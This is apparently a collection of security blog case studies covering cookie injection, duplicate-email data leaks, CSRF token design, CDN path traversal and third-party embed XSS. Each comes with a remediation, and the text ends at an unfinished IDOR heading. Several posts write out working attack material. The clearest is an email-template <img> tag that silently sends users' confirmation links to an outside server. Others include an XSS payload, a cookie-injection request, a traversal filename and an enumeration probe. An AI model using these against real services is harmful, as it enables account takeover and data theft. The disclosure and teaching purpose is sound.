Phishing++ – Chapter I

Hi! What’s going on?

Today’s case-study is a bit different: it is a two-part article. The next chapter will be published as soon as a certain company allows us to publicly disclose two vulnerabilities they had.

Today I’m not gonna talk about a regular attack – this whole chapter is about Phishing.

So phishing – why the hell are we talking about it? “It’s not a security issue”

I’ve heard dozens of statements about how phishing is not an actual vulnerability, and many public companies think so. It’s fair to say that they are quite right – a 3rd-party website pretending to be the real one is not an actual vulnerability in the real site.

But does that mean that the company should not care at all? No. Some companies (like PayPal, Facebook, etc.) report phishing attacks to anti-virus companies, which then block users from entering the malicious site. That’s fair, but it’s not enough. There is not enough manpower or even “internet crawling power” to fully protect users from malicious phishing websites. Actually, most companies don’t care that there are malicious pretenders out there. In their ToS, some of them rudely state that the customer is fully responsible for any data or money lost or stolen if he falls victim to a phishing attack.

But I say there is more to do than looking at the sky and counting birds. Some research I conducted on phishing websites that pretended to be PayPal and Facebook led me to write this chapter of the case-study, instead of fully presenting a vulnerability as I always do.

I realized that in order to perfect their visual appearance, phishing websites use actual images, CSS and JavaScript from the original site. This means that a PayPal-like phishing site “https://xxxx.com” has image and script tags which fetch images and scripts from the original PayPal site (or https://paypalobjects.com, to be accurate)!

Why are they doing this & why the f* should that matter?
They do it because they want the experience of the website to be exactly like the original. And how can that be achieved? Simple! By using the same images and JavaScript.
Most of those websites have only one page – either Login (to steal the login credentials) or Pay (to steal credit card details). The actual source code is a lot like the original, except for minor changes to the way the data is sent.
That matters because once a company knows that a malicious website is using its assets – it can stop it!

A simple fix that the company can ship “tomorrow morning” is to disallow fetching of JavaScript, images and CSS style sheets by unauthorized 3rd-party websites, as sketched below. This way, phishing websites will have to work harder to reproduce the experience and appearance of the original website.
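To make that concrete, here is a rough sketch of such a restriction (this is not any particular company’s setup; the framework, origins and paths are made-up examples). A static-asset server checks the Referer header and refuses to serve images, scripts and style sheets to pages hosted on unknown origins:

import express from "express";

const app = express();

// Hypothetical list of origins that are allowed to embed our static assets.
const allowedReferers = ["https://www.example-bank.com", "https://checkout.example-bank.com"];

// Guard every static asset (images, scripts, style sheets) behind a Referer check.
app.use("/static", (req, res, next) => {
  const referer = req.get("Referer");
  // Browsers sometimes omit the Referer header; how strict to be is a policy decision.
  const allowed = !referer || allowedReferers.some((origin) => referer.startsWith(origin));
  if (!allowed) {
    // An unknown site (possibly a phishing clone) is hot-linking our assets.
    res.status(403).send("Forbidden");
    return;
  }
  next();
});

app.use("/static", express.static("public"));
app.listen(3000);

The same idea can be enforced directly in the web server or CDN configuration; the point is that hot-linking from unlisted origins simply stops working.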

It’s never 100%
Even if websites disallow unauthorized fetching of their assets, phishing sites will always be able to store the images, CSS and JavaScript “on their own”. It’s a cat-and-mouse race that is probably far from over.
But it’s another step forward. Making life harder for phishing site makers should be a life goal of every company and security researcher.

Heads up for the next chapter! Cheers.

Cookies And Scream

Whoa, what a summer!
I know, we haven’t been active in the last month – blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over and now it’s time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I’ve talked enough about the importance of properly handling and sanitizing user-supplied input. There are tons of XSS and HTML filters out there, and they do a pretty good job.
But user input isn’t always shown on the page or inserted into the DB. In some cases, popular web platforms store it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

Request:
GET https://cms.paypal.com/cgi-bin/marketingweb?cmd=test HTTP/1.1
Host: cms.paypal.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

Response:
HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test; domain=.paypal.com; path=/; Secure; HttpOnly

There’s nothing evil about storing user-supplied input in a cookie; it’s actually good practice sometimes, if you don’t want to use sessions or a similar mechanism.
A very common use of user-supplied input in a cookie is storing a redirect URL: sometimes you want to remember which page the user came from, or where to redirect him at the end of the process. Keep that in mind.
Before I get to the vulnerability itself, I’ll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitization mechanism.

A well-known finance company had this exact cookie functionality. User input from certain GET parameters was stored in cookies. For example, the value of the GET parameter ‘redirect_url’ was stored in the cookie ‘return_url’. This cookie was then used by dozens of other pages to redirect users to a “thank you” page. An open redirect attack on that parameter was not possible, because the value of the GET parameter ‘redirect_url’ was checked & verified before being added as a cookie.

At first glance – everything looks fine. I read the JS code that was responsible for sanitizing the input and determined that it was doing its job pretty well – no HTML entities or other “bad” characters (like ‘ or “) could be reflected – thanks to the encodeURI function that was being used extensively.

And then it hit me: encodeURI doesn’t encode characters like ; or = – the exact characters that are used when setting a cookie!
So, a GET request to the vulnerable URL, without the ‘return_url’ GET parameter (to prevent collisions):

Request:
GET https://vulnsite.com/action?vulnGETParameter=xyz;return_url=https://fogmarks.com HTTP/1.1
.
.

Response:
HTTP/1.1 200 OK
.
.
Set-Cookie: vulnGETParameter=xyz;return_url=https://fogmarks.com; domain=.vulnsite.com; path=/; Secure; HttpOnly

In some cases, the result was an open redirect on pages that relied on the value of ‘return_url’ always being safe.

When you decide to store user input in a cookie, you must know how to treat it properly, and you must remember to dispose of it when the time is right. In this case, using the same sanitization mechanism for input that is shown on the page and for input that is inserted into a cookie was wrong.
The patch here was simple: instead of encodeURI, encodeURIComponent() was used.
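To illustrate the difference (a minimal sketch; the parameter name and domain are just the ones from the example above):

// encodeURI leaves ';' and '=' intact, so extra cookie pairs can be smuggled in:
const payload = "xyz;return_url=https://fogmarks.com";

console.log(encodeURI(payload));
// -> xyz;return_url=https://fogmarks.com            (';' and '=' survive)

console.log(encodeURIComponent(payload));
// -> xyz%3Breturn_url%3Dhttps%3A%2F%2Ffogmarks.com  (';' and '=' are percent-encoded)

// If the server echoes the encodeURI'd value into Set-Cookie, the header becomes:
// Set-Cookie: vulnGETParameter=xyz;return_url=https://fogmarks.com; domain=...
// i.e. the attacker has injected a second cookie pair.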

Happy & chilled autumn folks!

Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never discussed before (or maybe a little bit) – proper & secure Database management.

So, databases – we all use them. SQL-based or not, we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, SQL-based databases (MySQL, MS-SQL, etc.) are currently still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no ;-)

So – properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? It’s so obvious to manage and control my DB!” Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanisms.
b. There is only one user – the root one – and every mechanism uses it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permissions set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t say, because there might be children reading these lines, and it’s bed time.

The database is one of the holiest mechanisms in the application. No matter what type of data it stores – it should be treated well.

A well-treated DB (Database)
First, let’s set things straight – a “well-treated DB” does not mean a “suffering-from-obesity DB”. This case-study will not discuss the type of DB collection your application should use, rules for not flooding your DB, or the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real-life example, and will supply some fundamental guidelines to keep your application safer.

A well-known real estate company, whose name we cannot disclose (and we respect their decision), suffered from some of the horrifying cases I described above: their connection string was known to a lot of mechanisms, they had only one, fully-privileged root user, and they didn’t have automatic periodic backups.

They had a main production DB with a few tables. The main table was ‘user’ – a table which, among other stuff, held the user ID, username (which was an email address) and salted password.

The email address was the user’s main identifier, and it could be changed/replaced by the user. The change took place immediately, and until the user clicked a confirmation link sent to the new email address he supplied, he wasn’t able to execute any “massive” action on the application, except for information fetches. Which means – the user was still able to see his own objects and data on the application.

So far so good – despite the lack of awareness of the mentioned horrors (shared connection string, root user, no backups) – no SQL injection was possible, no CSRF was found, and the code was pretty much secure. Except for one thing – it was not possible to supply an already existing email address when signing up, but it was possible to change an email address to an existing one.

“So what?”, “What’s the impact?”, you say.
Well, at first I also thought: meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table – things went crazy. Actions and data relevant to one account became relevant and visible to the other!

For example, the query to view all private assets related to a given email looked very simple, something like:

SELECT * FROM Assets WHERE EmailAddress = '<EMAIL_ADDRESS>';

And it returned the private assets related to BOTH rows holding that email. An attacker could have changed his email to a victim’s one and then leaked highly valuable, private data.

When the company and we examined the code, we understood that a separate mechanism was responsible for changing the email address – and it performed no existence checks at all. A simple mistake which could have led to a major disaster.
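As an illustration only (the table and column names are made up, not the company’s real schema), the email-change path needs the same uniqueness check the sign-up path already had – ideally backed by a UNIQUE constraint so that two concurrent requests can’t race past it:

// Minimal interface for whatever DB driver is in use (hypothetical).
interface Db {
  query(sql: string, params: unknown[]): Promise<{ rows: any[] }>;
}

async function changeEmail(db: Db, userId: number, newEmail: string): Promise<void> {
  // The check the vulnerable mechanism was missing: is this address already taken?
  const existing = await db.query(
    "SELECT Id FROM Users WHERE EmailAddress = ? AND Id <> ?",
    [newEmail, userId]
  );
  if (existing.rows.length > 0) {
    throw new Error("Email address is already in use");
  }

  // Mark the address unconfirmed until the user clicks the confirmation link.
  await db.query(
    "UPDATE Users SET EmailAddress = ?, EmailConfirmed = 0 WHERE Id = ?",
    [newEmail, userId]
  );
}

// Belt and braces: a UNIQUE constraint on Users.EmailAddress makes the race between two
// concurrent changeEmail() calls fail loudly instead of silently creating duplicates.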

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this is a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to have one and only one DB-managing mechanism. Write a simple, shared DB wrapper that every other mechanism in your application has access to (a rough sketch follows after this list). Don’t have a separate DB util for each feature, and certainly don’t allow unrelated mechanisms to supply the SQL query.
2. Don’t be naive. Check every piece of user-supplied data for malicious characters. Integrate your existing sanitization engine into your DB-managing mechanism.
3. If you can – never delete anything from the DB. Remember: restoring is harder than resetting. It is best to simply mark a row as ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: don’t allow unauthorized users to execute requests that influence the DB.
5. Have a periodic, 3rd-party service that backs up your DB every x hours. Provide this service with a separate user that has only SELECT privileges.
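A rough sketch of such a shared wrapper (the driver interface and names are hypothetical; the point is that every feature goes through one place that only runs parameterized queries):

// The one, application-wide gateway to the database.
interface Driver {
  execute(sql: string, params: unknown[]): Promise<{ rows: any[] }>;
}

export class DbGateway {
  constructor(private readonly driver: Driver) {}

  // Every query in the application must go through this method, so parameters
  // are always bound by the driver and never concatenated into the SQL string.
  async run(sql: string, params: unknown[] = []): Promise<any[]> {
    const result = await this.driver.execute(sql, params);
    return result.rows;
  }
}

// Features import the single shared instance instead of opening their own connections:
// const rows = await gateway.run("SELECT Id FROM Users WHERE EmailAddress = ?", [email]);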

These 5 “golden” guidelines (and #5 is the most important, in my opinion) will help make sure you won’t have a heart attack when things go wrong.
We’ll talk about having a Defibrillator later.

Unboxing

Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new ground in web & application research. Today we would like to present one of those new areas.

Our research over the past couple of months did not focus on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have a known definition.
Today’s case-study is exactly one of those exciting new findings. This time, the research was not company-specific. It was method-specific.

Method-specific research?
It’s simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are done in the most widely used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is being used around the web.

In short, the SMTP protocol is widely used by millions of web applications to send email messages to clients. The protocol is very convenient and easy to use, and many companies rely on it every day: swapping messages between employees, communicating with customers (notifications, etc.) and much more. But the most common use of SMTP right now (or simply of ‘sending mail’) is to verify user accounts.

One of SMTP’s features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a web application, they immediately get an email which requires them to approve or verify themselves, as proof that the email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. The email contains a link with an access token that validates that the email address is indeed used by the client. The email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)’.

“SMTP allows sending HTML, so let’s send XSS to users and party hard” – not really. Although HTML is supported over SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML that arrives over SMTP before parsing it and rendering it to the viewer.

And that’s where I started to think: how can I hijack the verification link that users receive in their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I could include sanitized, non-malicious HTML, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)">Click here!!!</a>

And it worked. The users received an email with non-malicious HTML code. When they clicked the link, the confirmation link was logged on a server of mine.

I thought: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event?” Well, the answer is incredible. I’ll use the one allowed tag that is loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)" />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML’s automatic image-loading mechanism, and the fact that sanitized HTML could be sent over SMTP.

Google did not accept this submission. They said, and they are totally right, that the mail is sent by FeedBurner with a Content-Type: text/plain header, and therefore it is the email provider’s fault for ignoring this header and still parsing the HTML, although it is told not to.
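For what it’s worth, the sender side of that argument looks roughly like this – declare the body as plain text and let compliant clients refuse to render any markup inside it. A minimal Node sketch using nodemailer (the SMTP host, addresses and link are placeholders, not FeedBurner’s actual setup):

import nodemailer from "nodemailer";

// Placeholder SMTP relay - swap in the real host and credentials.
const transporter = nodemailer.createTransport({
  host: "smtp.example.com",
  port: 587,
});

async function sendConfirmation(to: string, confirmLink: string): Promise<void> {
  // Using `text` (not `html`) yields a Content-Type: text/plain body; a compliant
  // mail client shows any <img> or <a> tags as literal text instead of rendering them.
  await transporter.sendMail({
    from: "noreply@example.com",
    to,
    subject: "Confirm your subscription",
    text: `Please confirm your subscription: ${confirmLink}`,
  });
}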

Still, this case-study was presented to you so you can see how everyday, “innocent & totally safe” features can be used to cause great harm.

Tokens Tokening

Our case-study today will set some ground rules for a new anti-CSRF approach I have been working on for the past few months. This new approach, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don’t freak out! You’ll understand it in no time.

First, I must say that I am probably not the first one to think of this approach. During some research I came across the same principles as the token-cataloging method I am about to show you.

So, what the hell is token cataloging, you ask? It’s simple. This is an anti-CSRF security approach (/policy/agreement/arrangement – call it what you want) where CSRF tokens are separated into different action categories. This means there will be one token type for input actions, such as editing a certain field or inserting new data, and a different token type for output actions, such as fetching sensitive information from the server or requesting a certain private resource. These two main token groups will now lead our way to security perfection. Whenever a user is supplied with a form to fill, he will also be supplied with an input-action token – a one-time, short-lived token which is only valid for this specific session user and expires x minutes after its creation time. This input token is then tied to this specific form’s token family, and is only valid for actions of that family type.

Now, after explaining the “hard, upper layer”, let’s get down with some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new approach separates the tokens into different families, we also use different types of tokens – some tokens should be only integers (long, of course), some only characters, and some both. When there is no need to save the token for a later action, the token should not be kept in any data collection, and it should be generated specifically for each user.
What does that mean? That we can derive tokens from the session user’s details which we already have – the session cookie, the username (obfuscated, of course) – and mix in a few more factors in order to generate the token in a unique way, one that can only be ‘understood’ by our own logic later, in the token validation process. No more creating a random, meaningless 32-character token that can be used a trillion times. Each action should have its own unique token.
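A minimal sketch of that derivation (the factors, action families and expiry window are examples, not a prescription). It covers the stateless part – binding a token to a session, an action family and an expiry – while true one-time use would still need a little per-session bookkeeping:

import { createHmac, timingSafeEqual } from "crypto";

const SERVER_SECRET = "replace-with-a-long-random-secret"; // never hard-code this for real

// Derive a token from things the server already knows: the session, the
// action family ("input:new-post", "output:post-info", ...) and an expiry time.
function issueToken(sessionId: string, actionFamily: string, ttlMinutes = 10): string {
  const expiresAt = Date.now() + ttlMinutes * 60_000;
  const mac = createHmac("sha256", SERVER_SECRET)
    .update(`${sessionId}:${actionFamily}:${expiresAt}`)
    .digest("hex");
  return `${expiresAt}.${mac}`; // nothing has to be stored in the DB
}

function validateToken(token: string, sessionId: string, actionFamily: string): boolean {
  const [expiresAtRaw, mac] = token.split(".");
  const expiresAt = Number(expiresAtRaw);
  if (!mac || Number.isNaN(expiresAt) || Date.now() > expiresAt) return false;

  const expected = createHmac("sha256", SERVER_SECRET)
    .update(`${sessionId}:${actionFamily}:${expiresAt}`)
    .digest("hex");
  return mac.length === expected.length &&
    timingSafeEqual(Buffer.from(mac), Buffer.from(expected));
}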

“This is so frustrating and unnecessary, why should I do it?”
If you don’t care about form resubmission, that’s OK. But what about anti-brute-forcing, or even anti-DoS? Remember that each action that inserts or fetches data from the DB costs you space and resources. If you don’t have the right anti-brute-force or anti-DoS mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this approach costs you too much, simply implement some of the ideas that were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don’t want to generate a token for each of a user’s unique actions, at least generate a token for each “general” action type, like output and input actions.

Once Upon A Bit

Today’s case-study is pretty short – you are going to get its point in a matter of seconds.
We are going to talk about observation, and about the slight difference between a non-bug and a major security issue.

Every security research effort requires a respectable amount of attention and discernment. That’s why there are no truly successful industrial automated security testers (excluding XSS scanners) – machines cannot recognize every kind of security risk. As a matter of fact, machines cannot feel danger or detect it. There is no single way to conduct security research against a given target. The research parameters differ and vary with the target. Some research ends after a few years, some after a few days, and some after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (for the attacker) that no further research was needed in order to reach the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozen industrial companies and start-ups, asked us to test its “database” resistance. Our goal was to leak the names of clients from a certain type of collection – not an SQL-driven one (we still haven’t got the company’s approval to publish its name or the type of vulnerable data collection).

So, after a few minutes of examining the queries which fetch information from the data collection, I understood that the name of the data row is required in order to perform a certain action on it. If the query issuer (the user asking for information about the row) has permission to see the results of the query – a 200 OK response is returned. If he doesn’t – again – a 200 OK response is returned.

At first I thought that this was correct behavior. Whether the information exists in the data collection or not – the same response is returned.
BUT THEN, completely by accident, I opened the response for the non-existent data row in Notepad.

The end of the 200 OK response contained an unfamiliar UTF-8 character – one that shouldn’t have been there. The response to the non-existent data row request was longer by a single character!

At first, I was confused. Why does the response to a non-existent resource contain a weird character at the end of it?
I was sure there was some JS code that checked the response and drew conclusions from that weird character – but there wasn’t.

This was one of those cases where I cannot fully explain the cause of the vulnerability, for a simple reason – I don’t see the code behind it.

The company’s response, besides total shock at our fast turnaround, was that “apparently, when a non-existent resource is requested from the server, a certain sub-process which searches for this resource in the data collection fires up and encounters a memory leak. The result of the process should, by rule, be an empty string, but when the memory leak happens, the result is a strange character” – the same one which was being added to the end of the response.
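To make the impact concrete, an enumeration probe against such a length oracle could look roughly like this (the endpoint, parameter and candidate names are entirely made up):

// Hypothetical probe: compare response body lengths for candidate row names.
// The response for a non-existent row is one character longer, so any
// candidate whose response length differs from the baseline is assumed to exist.
async function probe(baseUrl: string, candidates: string[]): Promise<string[]> {
  // Establish the "does not exist" baseline with a nonsense name.
  const baselineRes = await fetch(`${baseUrl}?row=definitely-not-a-real-row`);
  const baselineLen = (await baselineRes.text()).length;

  const existing: string[] = [];
  for (const name of candidates) {
    const res = await fetch(`${baseUrl}?row=${encodeURIComponent(name)}`);
    const len = (await res.text()).length;
    if (len !== baselineLen) existing.push(name); // shorter response -> the row exists
  }
  return existing;
}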

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes this is more convenient and can save a lot of time, but whenever you use another process – you cannot fully predict its results. Remember – it can crash, freeze, or be force-closed by the OS or by some other process (anti-virus?).
If you must use a thread or sub-process, at least do it responsibly – make sure the OS memory isn’t exhausted, validate the arguments you pass to the process, check the process’s permission to run, and consider its possible result scenarios. Never let the process run or execute critical commands based on user-supplied input.

Independence Is Not a Dirty Word


Happy New Year! This is the first post of 2017.
I hope you guys weren’t as hungover as I was. Seriously.

So, as promised in the last case-study, today we are going to see a very interesting case-study that will make you fire up those 4th of July fireworks, or do some BBQing in the park. Hmmm! Kosher bacon! (NOTE: bacon is not kosher).

Everyone seems to love jQuery. This awesome “JavaScript library” seems to be everywhere I look – thousands of companies use it on the client side of their websites, and it is super convenient, especially when it comes to AJAX requests – importing jQuery makes our lives a whole lot easier.
jQuery is not alone. Google and Microsoft (and sometimes Mozilla and Apple as well) release new JS libraries all the time, and advise developers to use them and import them into their products. For example, if you want to play a QuickTime video, you should import Apple’s QuickTime JS library, and if you want that neat jQuery DatePicker, you should import that library from Google, jQuery or any other mirror.

Count the times I used the word ‘import’ in the last paragraph. Done? 4 times.
Whenever we want to use certain ‘public’ JS code, which belongs to a certain company or service, we import it directly from them.
To be clearer, we simply put a <script> tag on our website, with a ‘src’ attribute pointing to the JS file’s address:

<script src="http/s://trustworthydomain.com/path/to/js/file.js"></script>

Did you get it? We are loading a script from another website – a 3rd-party website – into our own website’s context. We are violating the number one rule of web security – we are trusting another website.

Now, this might sound a little stupid – why shouldn’t I be able to import a script from a trustworthy company like jQuery, Microsoft or Google? And you are basically right.

But when you import a script from a trustworthy company, 90% of the time you will be importing it from the company’s CDN.
CDN stands for Content Delivery Network, which is (quoting): “a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.”

It’s a hosting service which serves the company’s clients based on their location and a few other factors. The JS file you are importing is not kept on the company’s official server (again – most of the time).

In this case-study we’ll see how a very popular web software company, which of course we cannot reveal yet, fell for this.

This company developed a very popular JS library and hosted it on a 3rd party CDN they purchased. That CDN was kind of ‘smart’ and redirected users to the closest server according to the user’s location:

When a request arrived at the main server, the server determined the location of the IP and routed the request to the nearest server according to that location.

Dozens of websites planted a <script src> tag in their source code pointing at that company’s main CDN server, and it provided their users with the necessary JS libraries every time.

But after doing some research on the Apache server running on Server C (Copy C in the image), we concluded that this server was vulnerable to an arbitrary file upload attack, which allowed us to upload a file to the CDN. Not that serious, at first glance.
But! When we examined the way the file was uploaded (without authorization, of course), we saw that it was possible to use a directory traversal on the file path. We simply changed the filename to ../../../<company’s domain>/<product name>/<version>/<jsfilename>.js and we were able to replace the company’s legitimate JS file with a malicious one.

Basically, we had an XSS on dozens of websites and companies, without even researching them. The funny thing was that this attack affected only users who got directed to the vulnerable server (Server C).

What do we learn from this? (TL;DR-FU ;-)
Never trust 3rd-party websites and services to do your job! I’ve told you that millions of times already! Be independent. Be a big boy who can stay home alone. Simply download the JS file manually and keep it on your own server!

But what happens when the JS library I am using gets updated?
Clearly, there is no easy way to keep track of it.
I advised a client of mine to simply write a cronjob or a Python script that checks the latest version of the JS library available on the company’s server and compares it to the local one. If the versions are not equal – the script sends an email to the tech team (a rough sketch follows below).
Or you can simply check it manually every once in a while. Big JS libraries don’t get updated that often.
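A rough sketch of that check, meant to be run from a cronjob (the author suggests a cronjob or a Python script; this is an equivalent Node/TypeScript version, and the URL, file path and alerting are all placeholders):

import { readFile } from "fs/promises";
import { createHash } from "crypto";

// Placeholder locations - point these at the real upstream file and your local copy.
const UPSTREAM_URL = "https://cdn.example.com/library/library.min.js";
const LOCAL_PATH = "/var/www/static/js/library.min.js";

const sha256 = (data: Buffer) => createHash("sha256").update(data).digest("hex");

async function checkForUpstreamChange(): Promise<void> {
  const upstream = Buffer.from(await (await fetch(UPSTREAM_URL)).arrayBuffer());
  const local = await readFile(LOCAL_PATH);

  if (sha256(upstream) !== sha256(local)) {
    // Hook up your real alerting here (email to the tech team, ticket, chat message...).
    console.log("Upstream JS library differs from the local copy - notify the tech team.");
  }
}

checkForUpstreamChange().catch((err) => console.error(err));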

So, after the horror movie you’ve just watched, the next thing you are going to do, besides making coffee, is to download your 3rd-party libraries to your own server.

Cheers.

API – A. P.otentially I.diotic Threat


Happy Hanukkah and Merry Christmas to you all!

The end of the year is always a great time to wrap things up and set goals for the next year. And also to get super-drunk, of course.

In today’s holiday-special case-study we’ll examine a case where an attacker on one website can affect an entirely different website, without accessing the second one at all. But before that, we need to talk a bit about Self-XSS.

Basically, Self-XSS is a stupid vulnerability. Ideally, to be attacked, victims need to paste ‘malicious’ JS code into their browser’s Developer Console (F12), which causes the code to execute in the context of the page the Developer Console is active on.
When Self-XSS attacks started, users were persuaded to paste the JS code in order to get a certain ‘hack’ on a website.
To deal with that, to this day Facebook prints a warning in every page’s Developer Console, urging users not to paste code there.

Because websites can’t prevent users from pasting malicious JS code into the DC (Developer Console), Self-XSS (SXSS) vulnerabilities are not considered high-severity vulnerabilities.

But today we’ll approach SXSS from a different angle. We are about to see how websites can innocently mislead victims into pasting ‘malicious’ JS code planted by an attacker.
Some websites allow users to embed HTML or other kinds of code into their own websites or personal blogs. This HTML code is often generated by the websites themselves and handed to the users as-is in a text box. All the users have to do is copy the code and paste it in the desired location.
Now, I know this is not the exact definition of an API, but this is my definition of it – a 3rd-party website gives another website code which provides a certain service. In my opinion – that is what an API is about. If you think I’m wrong, comment below, and I will silently ignore it 😉

A very well-known company, which hasn’t allowed us to disclose its name yet, allowed users to get HTML code containing data from a group the users were part of – as owners or participants.
When pasted into a website, the HTML displayed the latest top messages in the group – their titles and the beginning of their bodies.

When ‘malicious’ code was placed in the title, like "/><img src=x onerror=alert(1)/>, nothing happened on the company’s own website – they correctly sanitized and escaped the whole malicious payload.

BUT! In the embedded HTML that displayed the latest messages there was no escaping at all, and suddenly attackers could run malicious JS code from website A in the context of website B! Just by planting the code in the title of a group topic.

So whose fault is this? Who was a naughty boy and needs to be spanked?
Both websites should get a no-no talk.
Website A is the one that supplied the ‘API’ – HTML code that shows the latest messages from a group hosted on it – but the API does not escape malicious payloads correctly.
But website B violated the number one rule – never trust a 3rd-party website to do your job. Website B added unknown code (not as an iframe, but as a script) and didn’t set any ground rules – it blindly executed the code it was given.

A certain client asked me about this a few weeks ago. She said:
“I must use 3rd-party code which is not an iframe, what can I do to keep my website safe?”
Executing 3rd-party JS code on your website is always bad practice (and of course I’m not talking about code like jQuery or JavaScript dependencies, although these days I am writing a very interesting article addressing exactly that topic. Stay tuned).
My suggested solution is: simply plant that code in a sandboxed page, and then open an iframe to that page. IT’S THAT SIMPLE!

That way, even if website A does not escape its content as expected, the sandbox – website C – will be the one that gets punished (see the sketch below).
This, of course, does not apply to scenarios where website B’s context is a must for website A, but it will work 95% of the time.
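A minimal sketch of that setup (the sandbox page URL is a placeholder): website B creates a sandboxed iframe pointing at a throwaway origin – website C – which hosts a page containing only the 3rd-party snippet, so whatever that snippet does stays out of B’s context:

// On website B: embed the 3rd-party widget through a sandboxed iframe
// instead of dropping its <script> straight into our own page.
const frame = document.createElement("iframe");

// Hypothetical throwaway origin (website C) that serves only the 3rd-party embed code.
frame.src = "https://sandbox.example.com/third-party-widget.html";

// Allow scripts to run inside the frame, but keep it isolated: without
// "allow-same-origin" the framed content cannot touch B's cookies or DOM.
frame.setAttribute("sandbox", "allow-scripts");
frame.width = "400";
frame.height = "300";

document.body.appendChild(frame);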

Why did I classify this case-study’s vulnerability as a Self-XSS?
Simply because I believe that when you put 3rd-party code on your website you are doing a Self-XSS to yourself, and to all of your users.
The way I see it, Self-XSS is not just a silly ‘paste-in-the-console’ vulnerability. Self-XSS is simply running 3rd-party code inside your supposedly safe environment.

This article was the last one of 2016.
I want to thank you all for a great year. Please don’t drink too much, and if you do – don’t drink and bug hunt!
Happy holidays, and of course – happy & successful new year!

Knocking the IDOR


Hello to you all.

Sorry for the no-new-posts November; FogMarks has been very busy exploring new fields and worlds. But now – we’re back on, baby!

Today’s case-study is about an old case (and by old I mean 3 months old), but due to recent developments in an active research project on a very well-known company’s very well-known product, I would like to present and explain the huge importance of an anti-IDOR mechanism. Don’t be afraid, we don’t bite.

Introduction

Basically, an IDOR (Insecure Direct Object Reference) allows an attacker to mess around with an object that does not belong to him. This could be a user’s private credentials, like an email address; a private object that the attacker should not have access to, like a private event; or public information that should simply, and rationally, not be changeable by a 3rd person, like a user’s title (don’t worry – a case-study about the Mozilla vulnerability is on its way).

When an attacker is able to mess around with an object that does not belong to him, the consequences can be devastating. I am not talking just about critical information disclosure that could run the business into the ground; I am talking about messing around with objects in a way that could let the attacker execute code on the server. Don’t be so shocked – it is very much possible.

From IDOR to RCE

